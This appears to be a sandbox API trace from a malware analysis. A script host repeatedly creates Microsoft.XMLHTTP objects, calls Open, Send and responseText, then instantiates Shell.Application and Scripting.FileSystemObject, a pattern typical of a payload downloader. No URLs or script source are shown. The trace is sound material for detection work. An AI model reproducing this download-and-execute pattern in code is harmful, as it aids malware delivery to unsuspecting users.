	[0454.776] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0454.776] XMLHTTPRequest:IUnknown:Release (This=0x49c7268) returned 0x0
	[0454.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0454.776] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0454.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0454.776] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0454.776] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0454.776] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0454.776] SysStringLen (param_1=0x0) returned 0x0
	[0454.776] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0454.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0454.777] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bd0) returned 0x0
	[0454.777] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0454.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7308) returned 0x0
	[0454.777] ??2@YAPEAX_K@Z () returned 0x62f310
	[0454.777] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7308, pUnkSite=0x62f310) 
	[0454.777] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0454.777] XMLHTTPRequest:IUnknown:Release (This=0x49c7308) returned 0x0
	[0454.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bd0) returned 0x0
	[0454.777] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bd0) returned 0x3
	[0454.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0454.777] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bd0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0454.777] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bd0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0454.777] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0454.777] SysStringLen (param_1=0x0) returned 0x0
	[0454.778] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0454.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0454.778] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0454.778] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0454.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7268) returned 0x0
	[0454.778] ??2@YAPEAX_K@Z () returned 0x62f330
	[0454.778] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7268, pUnkSite=0x62f330) 
	[0454.778] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0454.778] XMLHTTPRequest:IUnknown:Release (This=0x49c7268) returned 0x0
	[0454.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0454.778] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0454.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0454.778] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0454.778] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0454.778] longjmp () 
	[0454.779] longjmp () 
	[0454.779] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0454.779] SysStringLen (param_1=0x0) returned 0x0
	[0454.779] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0454.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0454.779] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7300) returned 0x0
	[0454.779] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0454.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0454.779] ??2@YAPEAX_K@Z () returned 0x62f310
	[0454.779] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0454.779] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0454.779] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0454.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7300) returned 0x0
	[0454.779] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7300) returned 0x3
	[0454.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0454.779] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7300, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0454.779] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7300, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0454.780] longjmp () 
	[0454.780] longjmp () 
	[0454.780] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0454.780] SysStringLen (param_1=0x0) returned 0x0
	[0454.780] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0454.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0454.780] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7230) returned 0x0
	[0454.780] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0454.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7298) returned 0x0
	[0454.780] ??2@YAPEAX_K@Z () returned 0x62f330
	[0454.780] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7298, pUnkSite=0x62f330) 
	[0454.780] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0454.780] XMLHTTPRequest:IUnknown:Release (This=0x49c7298) returned 0x0
	[0454.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7230) returned 0x0
	[0454.780] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7230) returned 0x3
	[0454.780] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0454.781] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7230, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0454.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0454.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0454.781] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7230, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0454.781] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0455.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0455.790] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7230, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0455.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0455.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0455.790] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7230, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0455.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7230, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0455.790] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0455.790] SysStringLen (param_1=0x0) returned 0x0
	[0455.790] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0455.790] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0455.791] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0455.791] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0455.791] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0455.791] ??2@YAPEAX_K@Z () returned 0x62f350
	[0455.791] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0455.791] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0455.791] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0455.791] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0455.791] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0455.791] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0455.791] SysStringLen (param_1=0x0) returned 0x0
	[0455.791] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0455.793] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0455.793] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0455.793] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
